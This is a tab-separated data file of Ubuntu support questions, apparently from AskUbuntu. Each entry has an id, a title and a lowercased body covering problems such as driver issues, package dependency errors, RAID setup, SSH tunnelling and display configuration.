485794	how to make an executable file to update mysql database ?	i have an ubuntu server that is hosting my web application . but due to some security reasons it is not visible through internet . the customer needs to update the database and update some values in it , but due to same security reasons i am not allowed there any more so they asked me to create an executable file ( like batch files in windows ) that will update the database , hand it to the authorities and explain it to them so they can update the database . say i have a database named mydb with a user say myuser and mypassword , and i need to execute this query : update mydb.member set member_creditduedate='2025-09-21 12:00:00 ' ; how can i do this ?
485798	how does one uninstall ubuntu ?	i installed ubuntu 14.04 on my hp laptop and i formatted the partition which had windows 8.1 . so ubuntu could have all the hard drive space . is there a way i could uninstall ubuntu and reinstall windows 8.1 ?
485799	extending raid-1 with two more disk ( raid-1 = > raid 1+0 )	i have a ubuntu 12.10 installation with ( software ) raid-1 - only for data ( root-system and swap are on another drive ) . now i would like to add two more drives to the existing raid 1 ( basically to have raid 1+0 ) . i 'm pretty clueless on how to do it : how to configure/convert raid 1 to raid 1+0 ? also , is it possible to perform this without data loss ( i suppose not ) ?
485800	how to paste text from an external source into the xterm edited file ?	i want to copy some text from a webpage and paste it into a file opened with xterm editor . how can i paste my text into the xterm edited file ?
485801	why does not app update appear in software center ?	i have submitted an update ( v 1.1.0 ) for brightness controller and it was packaged about two months ago . but it still does not appear in software centre . it shows 1.0.1 ( the previous version ) however , it show v 1.1.0 in the online catalog . i see there are some reviews for 1.1.0 , so some people got the update . how to get the latest version ? i am using ubuntu 14.04 lts
485807	installing ubuntu 14.04 on external hard drive , operating system not found	had an external hard drive that had not installed any operating system on it previously , shrank part of it and then installed ubuntu 14.04 on it , everything went fine but then when i restarted , tried to boot from my external hard drive , was presented with a `` operating system not found '' message , any ideas what could be the problem ? or how should i do it ? i will provide any needed information
485809	how to resolve this problem on npm start	nikhil @ nikhil-hp-2000-notebook-pc : ~ $ npm start npm err ! error : enoent , open '/home/nikhil/package.json' npm err ! if you need help , you may report this *entire* log , npm err ! including the npm and node versions , at : npm err ! < http : //github.com/isaacs/npm/issues > npm err ! system linux 3.5.0-51-generic npm err ! command `` node '' `` /usr/local/bin/npm '' `` start '' npm err ! cwd /home/nikhil npm err ! node -v v0.10.28 npm err ! npm -v 1.3.26 npm err ! path /home/nikhil/package.json npm err ! code enoent npm err ! errno 34 npm err ! npm err ! additional logging details can be found in : npm err ! /home/nikhil/npm-debug.log npm err ! not ok code 0
485815	speakers & headphones play simultaneously on panasonic toughbook cf-52 mk1 with alsa	information i am running xubuntu 12.04 lts on a panasonic toughbook cf-52cca32be mk1 and i am using alsa instead of pulseaudio . the only problem i am experiencing is when plugging in headphones , audio continues to play through both headphones and speakers . this is a relatively common headphones detection problem of the driver . it has little to do with any internal switch in the headphones socket . here is the relevant hardware information . note that the reported information is conflicting ; ad1884 versus ad198x . $ inxi -axx audio : card intel 82801h ( ich8 family ) hd audio controller driver : snd_hda_intel bus-id : 00:1b.0 chip-id : 8086:284b sound : advanced linux sound architecture v : 1.0.24 $ cat /proc/asound/card*/codec* | grep codec codec : analog devices ad1884 $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : ad198x digital [ ad198x digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 important to note , i have grub_cmdline_linux_default= '' quiet splash acpi_osi=linux '' in /etc/default/grub . tried so far putting options snd-hda-intel model=panasonic and options snd-hda-intel position_fix=1 enable=yes and other variants in /etc/modprobe.d/alsa-base.conf and rebooting . see : sound from both headphones and speakers installing oem-audio-hda-daily-dkms from https : //code.launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily/+packages , selecting the headphone detection switch in alsamixer and rebooting . installing hda-jack-retask with configuration and reboot . see : http : //askubuntu.com/a/128829/164341 has anybody successfully resolved this headphone detection problem on this specific hardware ? edit : linux 3.13.7 announcement after all , it appears to be a kernel problem . here is what i happen to read in the linux 3.13.7 announcement : alsa : hda - add missing loopback merge path for ad1884/1984 codecs edit : works in xubuntu lts 14.04.1 !
485816	onboard/usb keyboard does n't work ( ubuntu 14.04 )	having not used ubuntu in over 5 years , my curiosity got the better of me . i 've dual booted ubuntu 14.04 alongside windows 8.1 on my surface pro . only just installing it yesterday , being the noob that i am , it took me awhile to get it looking the way i wanted . while still trying to edit things around today , under the terminal i tried to press `` ~ '' on the onboard keyboard for file directory stuff . that 's when the onboard keyboard decided not to work anymore . the keyboard itself pops up and you can see the keys being pressed but it does n't actually type anything . i 've tried googling my issue but it seems that no one else is suffering the exact same problem . i have no problems with using a mouse ( or using the touch screen ) , it 's just the onboard keyboard that 's giving me issues ... so my question is , does anyone have a solution for my problem ? i 'd like to keep using ubuntu but not being able to type whatsoever makes the os almost useless . edit : tested an usb wireless keyboard on my brother 's system ( exactly the same as mine ) and it works not a problem but on mine , nothing is outputted . edit edit : typing works perfectly under guest but not my account ...
485819	alternative solutions for ubuntu emulator	i have no supported hardware to run/test my apps on ubuntu touch . the ubuntu-emulator does n't work with my proprietary display drivers ( fglrx ) . is there another way to try ubuntu touch ? ( maybe in virtualbox ? )
485827	how to get back language icon that disappeared from my system ( 14.04 ) ?	in the ubuntu 14.04 , when i reboot my machine , the language icon keyboard disappeared . how can i solve this problem ?
485831	problem with uuid	i have tried those tutorial on this website base on the disk drive for uuid is not yet ready or not present . i am trying to boot a live usb also and the message is no default or ui configuration found . i have tried some tutorial using terminal and its not really working . i have tried some command on terminal but some command is not working like : sudo gedit /etc/fstab and it show a different code that is not matching with in their tutorial .
485834	ubuntu 14.04 running low graphics mode after upgrading software	i 'm having problem with my pc . it says `` system is running in low graphics mode '' i 'm using nvidia gt430 graphics card . everything was ok after installing ubuntu 14.04 but after installing software updates the error happen , i can no longer use my pc , the last thing i remember the default graphics driver i used was xorg nouvou driver . please help me i already reinstalled ubuntu 3times but have the same problem . i do n't know what to do .
485837	motog not recognized in ubuntu 12.04 , mtp mode not supported . why ?	i bought a motog handset and wanted to transfer music files to my phone . but as i connect it to my laptop , ubuntu does n't recognize the phone , whereas it detects my friend 's htc phone . basically , when my phone is on mtp mode , it is not recognized but once i switch to ptp mode , ubuntu does show up the device . i believe its a driver issue . but the problem is i do n't know what to do . its very tedious to copy files to my phone otherwise . i also installed virtual box and installed windows on it , but when i connect my device , it says no usb device connected . please suggest a solution . thanking in advance .
485839	problem in dkms installation	i 'm terrible with ubuntu , so i apologize of this is a terrible question to ask . however ... while combating a wireless driver issue , i 'm running the command to depackage the debian file by typing out sudo dpkg -i bcmwl-kernel-source_6.30.223.141+bdcom-0ubuntu2_i386.deb that 's all well and good and the command goes through however i run into the error : dpkg : dependency problems prevent configuratino of bcmwl-kernel-source : bcmwl-kernel-source depends on dkms ; however ; package dkms is not installed . dpkg : error processing package bcmwl-kernel-source ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : bcmwl-kernel-source i 'm sure the `` package dkms is not installed '' is the highlight and central element to my current problem , however i put the whole error block there in the event i was n't looking at it properly . this is 32-bit ubuntu 14.04 and i 'd appreciate any help with installing / finding the dkms package and getting it on my laptop here . i 'm currently on a windows machine without the capabilities of apt-get or anything like that , so if i could put it on a flash and be directed where to put it / where to install it on the laptop i 'd be eternally grateful !
485840	what happens if you choose pci=off at the livecd prompt ?	when at the grub screen for the ubuntu live cd you can choose options ( by pressing f6 ) and select an option called pci=off . what does that mean ? how will it change how ubuntu boots ?
485842	problem in working with hadoop under eclipse in my system ( 14.04 )	i have already installed hadoop-1.0.3 in my system ( 14.04 lts ) and executed a sample program 'wordcount ' sucessfully . then i tried to work hadoop under eclipse . i follow this link . i do , $ git clone git : //git.apache.org/hadoop-common.git from my home directory . and i got downloaded hadoop-common package in my home . after i enter into folder and do command as , $ cd hadoop-commom/ $ mvn install -dskiptests here happens some downloads and at last i got error as follows , 239k downloaded ( commons-lang-2.3.jar ) 11k downloaded ( plexus-i18n-1.0-beta-6.jar ) [ info ] [ enforcer : enforce { execution : default } ] [ warning ] rule 0 : org.apache.maven.plugins.enforcer.requiremavenversion failed with message : detected maven version : 2.2.1 is not in the allowed range [ 3.0.2 , ) . [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ error ] build error [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] some enforcer rules have failed . look above for specific messages explaining why the rule failed . [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] for more information , run maven with the -e switch [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] total time : 5 minutes 5 seconds [ info ] finished at : fri jun 20 11:34:23 ist 2014 [ info ] final memory : 31m/130m [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i ca n't identify where the problem cause , please provide me a solution . thank you .
485845	where is isc-dhcp-server configuration files in ubuntu 14.04 ?	on ubuntu 14.04 lts i can not find the path to isc-dhcp-server as it is mentioned in several areas as in this ( for ubuntu 12.04 ) . it is installed on my machine , but i want to access its configuration files that i can not see . where can i find it ?
485849	is there a way to send my ip packets to say node `` r '' inside network a from a node `` y '' in network b via ssh ?	i have two networks a and b consisting of linux nodes and i want to communicate between the two via ssh : both networks are separated by the internet . network a is behind a firewall , and allows only ssh connections to the nodes in it . network b consists of two nodes . i want to be able to send a packet to any of the nodes in network a . but note that the nodes in network a ca n't be accessed directly over the internet using a specific ip as only ssh is allowed . i do not have access to any of the firewalls for nat . how can i achieve this communication ? is there a way to send my ip packets to say node `` r '' inside network a from a node `` y '' in network b via ssh ?
485852	ubuntu 14.04 and broadcom bcm43142	the problem is as follows : in the live ubuntu card works after activating proprietary drivers : system- > administration- > hardware driversand . in the installed system , producing the same steps as he hangs on to apply changes . what to do ? prompt . i speak english very poorly , translated from google ) )
485856	how do i downgrade google chrome ?	presumably after an update , google chrome has very serious problems with page rendering . i want to downgrade it . ( switching to vmlinuz.old and initrd.img.old did not help ) . $ apt-cache policy google-chrome-stable google-chrome-stable : installed : 35.0.1916.153-1 candidate : 35.0.1916.153-1 version table : *** 35.0.1916.153-1 0 500 http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages 100 /var/lib/dpkg/status on a computer where google chrome works ok : $ apt-cache policy google-chrome-stable google-chrome-stable : installed : 34.0.1847.132-1 candidate : 35.0.1916.153-1 version table : 35.0.1916.153-1 0 500 http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages *** 34.0.1847.132-1 0 100 /var/lib/dpkg/status ( if i had the .deb on the 2nd computer , everything would be easier . but there 's no .deb . and no old .deb 's on the google site . ) so i try : $ sudo aptitude install google-chrome-stable=34.0.1847.132-1 unable to find a version `` 34.0.1847.132-1 '' for the package `` google-chrome-stable '' unable to find a version `` 34.0.1847.132-1 '' for the package `` google-chrome-stable '' no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . you see , it does not work . the synaptic manager also shows no version that i could set . so , how do i downgrade google-chrome-stable ? probably someone knows an archive of old google-chrome .deb 's ?
485863	simulate a middle-click on lenovo yoga 2 pro synaptics touchpad	i am writing a guide how to install ubuntu on lenovo yoga 2 pro to get a middle mousebutton , i tried this : i edited the file /usr/share/x11/xorg.conf.d/50-synaptics.conf . there i edited the `` touchpad catchall '' section , so it will look like this : section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' # this option is recommend on all linux systems using evdev , but can not be # enabled by default . see the following link for details : # http : //who-t.blogspot.com/2010/11/how-to-ignore-configuration-errors.html matchdevicepath `` /dev/input/event* '' option `` fingerlow '' `` 46 '' option `` fingerhigh '' `` 46 '' option `` clickfinger1 '' `` 1 '' option `` clickfinger2 '' `` 2 '' option `` clickfinger3 '' `` 3 '' option `` tapbutton1 '' `` 1 '' option `` tapbutton2 '' `` 2 '' option `` tapbutton3 '' `` 3 '' option `` areabottomedge '' `` 85 % '' option `` softbuttonareas '' `` 60 % 0 85 % 0 40 % 60 % 85 % 0 '' # btn2 lrtb - btn3 lrtb option `` emulatemidbuttontime '' `` 75 '' endsection ( source : http : //memobadz.wordpress.com/2014/02/16/lenovo-yoga-pro-2-on-ubuntu/ ) but this did n't enable a simulated middle click as mentioned in memobadz ' wordpress blog ( although it still helped a lot in other aspects ) . how do i simulate a middle mouse-button by tapping three fingers ? i could n't manage it with that help so far .
485865	ipv6 dynamic route from dhcp	ipv6 was configured locally in my network in ubuntu 12.04 , where one of my machine runs the dhcp server and other as client . but the client was not acquiring the route from dhcp . do we have to give route manually for ipv6 . ipv4 acquires route from dhcp , is that the same with ipv6 .
485870	rsnapshot bug with 14.04 - rsync not found error	using rsnapshot with the +rsync_long_args= -- rsync-path= '' sudo rsync '' command fails with a rsync not found error . if i do a rsync only without using rsnapshot the command works find so it 's not related to rsync . in addition if i install rsnapshot on a 12.04 server this issue does not occur even when pulling form the same server . i believe this is a bug introduced into 14.04 with rsnapshot as i 've removed the package from the 14.04 server and cloned the rsnapshot github repo and installed rsnapshot with it and the issue is no longer . not sure if it relates to the downstream debian package/bug of this : debian bug report logs - # 743310 has anyone else had this issue and can they confirm the issue ? if so i will submit a bug report , but just wanted to be sure before doing so . thanks
485871	upgrade from 13.10 to 14.04 interrupted - now i click on upgrade and the window closes	i want to upgrade to 14.04 and i 'm using 13.10 . i tried to upgrade it before but unfortunately the internet stopped working during downloading the files and i turned of the computer . when i click on upgrade and enter the password nothing happen and the upgrade window hide so what i can i do ? ?
485872	kensington trackball button configuration	i recently switched to ubuntu from win7 , cause i was tired of spending days trying to figure out how to run devtools made for linux run properly on windows ... .and so far i 'm happy with the decision . the only thing i still could n't figure out is how to properly configure my kensington trackball . i have read all the pre-existing answers , but i still ca n't figure it out , so i apologize if this has been answered before . under windows , i was used to having the trackballworks app , which lets me easily configure button mappings and such . under linux , i read online that i shall edit the xorg.conf file , but nowhere di i find a detailed manual page / specific tutorial . could someone kindly enlighten me ?
485873	fontconfig warning : `` /etc/fonts/conf.d/90-fonts-unfonts-core.conf ''	i am getting the following error frequently . ( example : when running zenity , firefox etc . commands / applications . ) fontconfig warning : `` /etc/fonts/conf.d/90-fonts-unfonts-core.conf '' , line 11 : having multiple values in < test > is n't supported and may not work as expected here is contents of file : ( $ cat `` /etc/fonts/conf.d/90-fonts-unfonts-core.conf '' ) < ? xml version= '' 1.0 '' ? > < ! doctype fontconfig system `` fonts.dtd '' > < fontconfig > < match target= '' font '' > < test name= '' family '' qual= '' any '' > < string > 은 바탕 < /string > < string > unbatang < /string > < string > 은 돋움 < /string > < string > undotum < /string > < string > 은 궁서 < /string > < string > ungungseo < /string > < string > 은 필기 < /string > < string > unpilgi < /string > < string > 은 그래픽 < /string > < string > ungraphic < /string > < /test > < edit name= '' antialias '' mode= '' assign '' binding= '' strong '' > < bool > true < /bool > < /edit > < edit name= '' hinting '' mode= '' assign '' binding= '' strong '' > < bool > false < /bool > < /edit > < edit name= '' autohint '' mode= '' assign '' binding= '' strong '' > < bool > true < /bool > < /edit > < edit name= '' hintstyle '' mode= '' assign '' binding= '' strong '' > < const > hintslight < /const > < /edit > < /match > < /fontconfig > how to solve it ?
485875	why do file transfers over usb slow down my whole computer ?	whenever i transfer large files , or large amounts of files , over usb to or from an external drive , the whole computer slows down to a crawl during the transfer . i 'm using ubuntu 14.04 , but i 've had this problem before in earlier versions . why does this happen ? i want to be able to file a bug report to stop this from happening . cheers , reid
485877	problem with xubuntu after boot from hard disk	i 'm now on windows but i have xubuntu too . when i restart my computer and boot into xubuntu , the loading screen appears and when is time to show up the desktop , nothing happens , it remains on black screen . before an hour or two everything was fine except downloading from internet . when i try to download something an error appears and says that i do n't have enough places to download . when i go to the file system and check how many place do i have on my hard disk it says , 36 gb on local disk ( second partition ) . when i restarted my computer the problem with the black screen
485882	can install lubuntu 13.10 but ca n't 12.04 on lifebook c1320d	i need lubuntu 12.04 lts on fujitsu siemens lifebook c1320d but ca n't install . i can get first screen to choose language and then either choose try ... or install ... system stuck after one minute ( no running dots ) . if i monitor prompt screen ( ctrl+alt+f1 ) there are no error messages , just welcome to 12.04 and couple more lines of info and stuck . i can do only reset after . i tried with f6 and `` nomodeset '' off but no luck . with 13.10 everything is smooth . what can i do ? is there option to boot live 13.10 and then via usb stick or cd ( i have second usb dvd-rw and can attach ) install 12.04 lts ? any other ideas ? i ca n't boot via usb stick ( no option in bios ) , only dvd-rw
485890	gedit crashes on opening having upgraded from 12.04 to 14.04	i upgraded from 12.04 to 14.04 so far its still pretty broken - using gnome flashback things see 'off ' and i can not quite put my finger on the problems . lots and lots of system crashes and error reports popping up all over the place . anyhow apart from those errors which i will need to whittle away i am having a problem with gedit . when i open it , i get the following error : gedit : libz.so.1 : no version information available ( required by /usr/lib/x86_64-linux-gnu/libxml2.so.2 ) gedit : relocation error : /usr/lib/x86_64-linux-gnu/libxml2.so.2 : symbol gzopen64 , version zlib_1.2.3.3 not defined in file libz.so.1 with link time reference can somebody please help me out here ?
485891	access the gyroscope and accellerator on yoga 2 pro	i have a lenovo yoga 2 pro and would like to get the gyroscope running . but how should i start accessing it and including it in my system ? ( here i made a dump of lspci -vvv and lsmod on my lenovo yoga 2 ) i would like to automatically rotate the screen when i rotate the laptop . i already have successfully created a script , that manually rotates the screen with the keyboard shortcut ctrl+alt+f5 ( see http : //askubuntu.com/a/485632/34298 ) maybe there is a way to adapt this script ? https : //gist.github.com/emiller/6488449 i also tried to add the autorotate ppa from karol krizka and install it : echo `` deb http : //ppa.launchpad.net/kkrizka/thinkpad-x61t/ubuntu lucid main '' | sudo tee /etc/apt/sources.list.d/kkrizka-auto-rotate.list # update apt-getâs package list : sudo apt-get update # install the script and necessary packages : sudo apt-get install wacom-tools python-xrandr autorotate but it seems like there is a dependency problem : the following packages have unmet dependencies : autorotate : depends : python-central ( > = 0.6.11 ) but it is not installable python-xrandr : depends : python-central ( > = 0.6.11 ) but it is not installable
485893	i ca n't dual boot ubuntu and windows 7 !	i had ubuntu 14.04 installed on my system ( toshiba satellite pro s500 ) , with partitions as below ( all on one hdd ) extended partiton 1.1 ubuntu 14.04 os , mounted at / ( root dir ) fs ext4 200gb ( logical partition ) 1.2 ubuntu user data , mounted at /home fs ext4 48gb ( logical partition ) 1.3 unallocated space ( to be used for installing windows 7 ) 50gb linux swap , 2gb ( primary partition ) i tried to install windows 7 on the unallocated space , however it did not work . i tried deleting the unallocated space , however it deleted the os partition as well as the unallocated space , therefore rendering my ubuntu not bootable/gone . windows did not install in the unallocated space at all , leaving me with not a lot . all i have is the windows 7 installer on a usb , gparted iso on usb and my computer any tips ?
485894	ubuntu 14 - unable to use sudo echo to overwrite files	for ubuntu 12.04 bash scripts , i used to be able to run commands like the example below to overwrite files : sudo echo 'line1 line2 line3 ' > /etc/some/config/file.conf ever since ubuntu 14.04 , i now have to break it up to get the same behaviour like so : sudo echo 'line1 line2 line3 ' | sudo tee /etc/some/config/file.conf i am guessing this is an extra security measure ? is there some way to go back to the old behaviour ? update as some have correctly pointed out , this behaviour is consistent across ubuntu 12.04 and ubuntu 14.04 . i believe i got mixed but because if one runs the command in a bash script called with sudo , then it executes fine , however , pasting the command into the cli , it results in permission denied . i was comparing apples with oranges .
485898	merge two video and make one of them smaller	i want to prepare a presentation . i captured the screen by kazam software and also my face via webcam by cheeze software , so what i have are two mp4 videos.now i want to merge them . i want to make the video which is include my face , smaller and add that to the top right of the another video which captured my power point.searching for some video editors on linux but i do not know which one have this ability ? for example openshot does not have this abiliy .
485900	virtualbox and mounting windows drive	i am using ubuntu 14.04 x64-bit as my primary os and i am planning to use windows 7 ultimate x64-bit os in virtualbox . how i can mount windows drive to my virtualbox ( oracle ) .
485904	ca n't install vlc package from the ppa `` the following signatures could n't be verified because the public key is not available ''	since i installed ubuntu i was unable to install video codecs i get the following errors : the following packages have unmet dependencies : the following packages have unmet dependencies : gstreamer1.0-libav : depends : libavcodec-extra-54 ( > = 6:9.13 ) but 7:1.2.5-1~trusty1 is to be installed depends : libavformat54 ( > = 6:9.1-1 ) but 7:1.2.5-1~trusty1 is to be installed depends : libavutil52 ( > = 6:9.1-1 ) but 7:1.2.5-1~trusty1 is to be installed depends : libc6 ( > = 2.14 ) but 2.19-0ubuntu6 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed gstreamer1.0-libav : i386 : depends : libavcodec-extra-54 ( > = 6:9.13 ) but 7:1.2.5-1~trusty1 is to be installed depends : libavformat54 ( > = 6:9.1-1 ) but 7:1.2.5-1~trusty1 is to be installed depends : libavutil52 ( > = 6:9.1-1 ) but 7:1.2.5-1~trusty1 is to be installed depends : libc6 ( > = 2.7 ) but 2.19-0ubuntu6 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed however , i was using vlc . i had to uninstall vlc for a reason , now i 'm unable to reinstall it . when i try to install vlc it gives me the following errors : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've tried all the solve for this kind of problems , none of the worked for me . i 've also tried aptitude which also did n't worked . installation from source also failed . apt-get update gives me an error : w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 6a9653f936fd5529
485915	change specific line in a file while transfering using ssh	i 'm deploying my project to production server using scp command . as part of the deployment process i upload to server the .htaccess file . locally , the environment is set to development : # set environment # [ production , staging , testing , development ] setenv kohana_env 'development' however , when uploaded to server it needs to be changed to production . is there any way i can accomplish that with ssh ?
485917	gimp : export every layer as a separate png image	i have come to a situation where i have an image in gimp with multiple layers . now , i want to export every single layer as an individual image ( png format preferably ) automatically to a folder somewhere . is this possible ? the long method : hide all layers except one , crop the section you want , export image . hide saved layer , unhide another one , crop section , export . repeat . kinda cumbersome for an image with about 20 layers .
485921	problem with desktop environments ubuntu	ok so here is the problem in short : i run ubuntu 14.04 lts with two desktop environments : gnome which i usually use and spectrwm . i removed gnome ( followed instructions from somewhere ) and left out with spectrwm . i accidentally ran the following command : `` sudo apt-get remove unity* ubuntu-desktop '' which caused a disaster ( cant access any desktop environment even spectrwm , running on low graphics mode , ... ) so how do i revert my last command ? by the way i tried to reinstall ubuntu-desktop and it gave me unmet dependencies errors , i did not try installing any unity package because i do not know which packages got removed because of this command . thank you all i really appreciate your help .
485926	issue in qt 5.2.1 app in linking libquazip.so library during making .deb package for ubuntu 14.04	i am making .deb package for the qt 5 .2.1 desktop app for ubuntu 14.04 64 bit . i have installed qt 5.2.1 on ubuntu 14.04 and made a demo app for the testing purpose in which i have used quazip library . during making the .deb package of the app i am getting the below issue . dpkg-shlibdeps : error : couldn’t find library libquazip.so.1 needed by debian/demoapp/usr/bin/demoapp1 ( elf format : ‘elf64-x86-64’ ; rpath : ‘’ ) dpkg-shlibdeps : warning : package could avoid a useless dependency if debian/demoapp/usr/bin/demoapp1 was not linked against libz.so.1 ( it uses none of the library’s symbols ) dpkg-shlibdeps : error : can not continue due to the error above note : libraries are not searched in other binary packages that do not have any shlibs or symbols file . to help dpkg-shlibdeps find private libraries , you might need to use -l. dh_shlibdeps : dpkg-shlibdeps -tdebian/demoapp.substvars debian/demoapp/usr/bin/demoapp1 returned exit code 2 make : *** [ binary-predeb-impl/demoapp ] error 2 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 debuild : fatal error at line 1364 : dpkg-buildpackage -rfakeroot -d -us -uc failed when i copy the libquazip.so.1 at the path /usr/lib in my machine then i got the below issue . dpkg-shlibdeps : error : no dependency information found for /usr/lib/libquazip.so.1 ( used by debian/demoapp/usr/bin/demoapp1 ) dh_shlibdeps : dpkg-shlibdeps -tdebian/demoapp.substvars debian/demoapp/usr/bin/demoapp1 returned exit code 2 make : *** [ binary-predeb-impl/demoapp ] error 2 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 debuild : fatal error at line 1364 : dpkg-buildpackage -rfakeroot -d -us -uc failed my cmakelists.txt file as per below . cmake_minimum_required ( version 2.8.9 ) project ( demoapp1 ) set ( cmake_prefix_path $ { cmake_prefix_path } “ ; /opt/qt5.2.1/5.2.1/gcc_64/lib/cmake ; ” ) find_package ( qt5widgets required ) include_directories ( /home/manojpatidar/manoj/work/qt_work/linux_package/demoapp-1.0/lib/quazip-0.5.1/quazip ) link_directories ( /home/manojpatidar/manoj/work/qt_work/linux_package/demoapp-1.0/lib/quazip-0.5.1 ) add_executable ( demoapp1 main.cpp mainwindow.cpp moc_mainwindow.cpp mainwindow.ui ) target_link_libraries ( demoapp1 quazip z ) install ( targets demoapp1 runtime destination bin ) qt5_use_modules ( demoapp1 widgets ) my debian control file is as per below . source : demoapp section : games priority : extra maintainer : manoj patidar build-depends : debhelper ( > = 8.0.0 ) , cmake , qtbase5-dev , cdbs standards-version : 3.9.4 package : demoapp architecture : any depends : $ { shlibs : depends } , $ { misc : depends } description : description description will come here i think i need to add some dependencies for quazip at the line depends : $ { shlibs : depends } , $ { misc : depends } . is there anything i have missed ?
485928	merge sdcard and built in drive using lvm [ xubuntu ]	i am trying to create a logical volume using lvm in my ( asus eeepc x101 ) with an sd card but something has failed . i found a tutorial on exactly what i want , but something failed during the process . i managed to create the merged drive but during the install the grub installation failed . i took some screen shots from the process . now what do i do to solve my issue ? ps : its a xubuntu-14.04-desktop-i386
485931	moved installation to another partition , now some python apps do n't work	i had to move the data from one small partition ( sda6 ) to a bigger partition ( sda3 ) . i first back-up using tar with this command tar -cvpzf and extracted with tar -xvpzf . both are formated with ext4 with default options . fstab was edited to direct to the bigger partition while i boot it . running some python written applications fails for example : indicator-cpufreq traceback ( most recent call last ) : file `` /usr/bin/indicator-cpufreq '' , line 18 , in < module > import logging file `` /usr/lib/python3.4/logging/__init__.py '' , line 26 , in < module > file `` /usr/lib/python3.4/traceback.py '' , line 3 , in < module > import linecache file `` /usr/lib/python3.4/linecache.py '' , line 10 , in < module > import tokenize file `` /usr/lib/python3.4/tokenize.py '' , line 34 , in < module > from token import * file `` /usr/lib/python3.4/token.py '' , line 1 -fresolution=/tmp/ccjeou9q.res ^ syntaxerror : invalid syntax command-not-found sorry , command-not-found has crashed ! please file a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please include the following information with the report : command-not-found version : 0.3 python version : 3.4.0 final 0 distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty exception information : invalid syntax ( token.py , line 1 ) they fail on /tmp directory . i guess . i tried to ; link it to /run or /run/shm ; re-create /tmp with permission set to 1755 and ownership to root ; repeat all from the start two times ; repeat all from the start but using rsync instead of tar ; rebooting ; linking the tmp folder from sda6 ; mounting /tmp as tmpfs with these options rw , size=104857600 , mode=0755 ; changed the permission to 777 ; and all possible combinations with what i have done . i am getting more desperate to find the answer because i use indicator-cpufreq to manually change the frequency so the laptop shall not overheat . since i ca n't use it , i can use the laptop for a period of time unless i manually change its frequency from /sys or use another command-line utility . either way , they are both inconvenient . could anyone shed some light in solving this tricky problem ?
485937	< enter > button does not work in guake for zsh	i have 2 machines with ubuntu 14.04 on them . on both machines i 've tried to switch shell to zsh for guake . as a result pressing button ( to run a command ) has no effect , although other buttons/features seem to work fine . so these bugs are reproduced stable on both machines with 14.04 .
485939	ca n't get ubuntu 14 to see my wifi	i can not get ubuntu 14 to recognise that i have a wifi connection . i have set it up in ubuntu , but it does not `` see '' it . what can i do ?
485940	unrecognized beamer on nvidia gtx 660 with 331.20 drivers	i 've an nvidia gtx 660 with 331.20 drivers installed on my ubuntu 14.04 and cant get my beamer recognized . i 've tested with latest drivers on windows 7 and is also not recognized even if another screen is recognized also in dvi-d second port . i 've tested different drivers even the latest proprietary version on ubuntu without success . is there something i 'm missing ? even xrandr does n't recognize it ... thx for your help !
485942	lcd display connected on lvds not working	i 'm trying to run ubuntu server 14.04 on a intel n2600 board with a 7 '' lcd panel connected through lvds connector . i successfully installed ubuntu server and i have installed also xorg and openbox ( beacause i need a graphic environment ) . the board i 'm using has a vga output ( where i have connected a monitor to perform the installation ) and the lvds connectors ( where i have plugged the 7 '' lcd panel ) . when grub starts the os , i initially see the kernel messages on the 7 '' lcd display , then it goes blank and there 's no way to make it work , while the vga output instead works correctly . using xrandr -q gives me this output : screen 0 : minimum 320 x 200 , current 1440 x 900 , maximum 4096 x 4096 vga-0 connected 1440x900+0+0 ( normal left inverted right x axis y axis ) 408mm x 255mm 1440x900 59.9*+ 75.0 1280x1024 75.0 60.0 1280x800 59.8 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 dvi-0 disconnected ( normal left inverted right x axis y axis ) displayport-0 disconnected ( normal left inverted right x axis y axis ) dvi-1 disconnected ( normal left inverted right x axis y axis ) edp-0 connected primary 800x480+0+0 ( normal left inverted right x axis y axis ) 519mm x 324mm 800x480 60.0*+ 50.0 40.0 it seems that the panel is recognized ( edp-0 ) , but i 'm not able to run the x graphical environment on it . i tried to run xrandr -- output edp-0 -- primary but nothing happens . how can i switch the output on the edp-0 display ?
